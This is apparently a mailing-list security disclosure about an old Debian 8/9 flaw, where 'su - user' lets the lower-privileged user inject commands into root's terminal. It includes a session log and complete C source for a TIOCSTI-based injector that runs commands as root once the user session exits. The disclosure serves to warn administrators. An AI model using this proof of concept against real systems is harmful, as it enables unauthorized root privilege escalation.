Ancient "su - hostile" vulnerability in debian 8
and 9
Ancient "su - hostile" vulnerability in debian 8 and 9
Just FYI.
Warning: This is rather old, since at least 2005, probably
much earlier. Check the links at:
http://www.openwall.com/lists/oss-security/2018/06/12/2
Summary: Doing "su - hostile" in debian 8 and 9 may lead
to root privilege escalation. Default sudo -u probably is
affected too.
Per chat with some admins they use su - user.
Session:
root@machine1:~# su - guest4
guest4@machine1:~$ (sleep 10; /tmp/a.out id) &
[1] 4737
guest4@machine1:~$ exit
logout
### just wait
root@machine1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@machine1:~# cat /tmp/tty.c
/*
*
* https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty
* */
#include <sys/ioctl.h>
#include <termios.h>
#include <stdio.h>
#include <stdlib.h>
void stackchar(char c)
{
if (ioctl(0, TIOCSTI, &c) < 0) {
perror("ioctl");
exit(1);
}
}
int main(int argc, char *argv[])
{
int i, j;
char c;
for (i = 1; i < argc; i++) {
for (j=0; (c = argv[i][j]); j++) {
stackchar(c);
}
stackchar('\n');
}
exit(0);
}